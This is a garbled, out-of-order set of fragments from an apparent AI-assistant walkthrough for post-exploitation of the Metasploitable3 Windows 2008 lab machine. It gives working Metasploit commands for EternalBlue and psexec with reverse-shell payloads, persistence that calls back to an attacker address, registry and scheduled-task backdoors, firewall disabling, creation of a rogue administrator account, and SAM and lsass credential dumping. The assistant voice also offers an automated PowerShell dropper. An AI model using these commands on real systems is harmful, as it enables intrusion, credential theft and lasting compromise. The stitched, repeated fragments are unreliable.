Metasploitable3-win2k8

use exploit/windows/smb/psexec set RHOSTS <another_target_ip> set SMBUser hacker set SMBPass P@ssw0rd123! set payload windows/x64/meterpreter/reverse_tcp run a) Metasploit persistence run persistence -X -i 60 -p 443 -r <your_ip> b) Registry run key reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v updater -d 'C:\windows\temp\backdoor.exe' c) Scheduled task (every hour) schtasks /create /tn "SysUpdate" /tr "C:\windows\temp\backdoor.exe" /sc hourly /ru SYSTEM 6. Interesting Artifacts on Win2k8 (Metasploitable3 specific) Check for:

Here’s a solid post-exploitation walkthrough for . Assumes you already have a Meterpreter session on the box. 1. Initial Foothold – Quick Review msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 > set RHOSTS <target_ip> msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 > exploit Get a shell, then upgrade to Meterpreter if needed: metasploitable3-win2k8

use exploit/windows/local/ms15_051_client_copy_image set SESSION <id> run If you want, I can send a full scripted version of this process (as a .rc file + PowerShell dropper) for automated post‑ex against Metasploitable3‑Win2k8. Assumes you already have a Meterpreter session on the box

impacket-secretsdump -sam sam.save -system system.save LOCAL Upload procdump → dump lsass → download → offline mimikatz. 4. Lateral Movement Preparation Enable RDP (if not already) shell netsh advfirewall set allprofiles state off reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f net user hacker P@ssw0rd123! /add net localgroup administrators hacker /add Check if RDP is listening on 3389. PSExec lateral (from MSF) From existing session, background and: impacket-secretsdump -sam sam